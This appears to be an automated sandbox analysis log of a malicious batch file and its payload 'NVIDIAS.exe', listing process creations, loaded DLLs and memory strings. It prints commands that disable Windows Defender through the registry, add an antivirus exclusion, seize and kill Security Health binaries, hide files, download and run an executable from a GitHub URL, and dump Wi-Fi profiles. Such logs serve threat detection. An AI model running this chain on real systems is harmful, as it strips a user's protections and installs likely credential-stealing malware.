    Source: NVIDIAS.exe, 00000015.00000002.1214141492.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004781000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362A000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004703000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000473F000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout.exe /t 10
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /cJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /cJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /FJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout.exe /t 10Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /dJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /dJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\cacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: version.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeSection loaded: wldp.dllJump to behavior
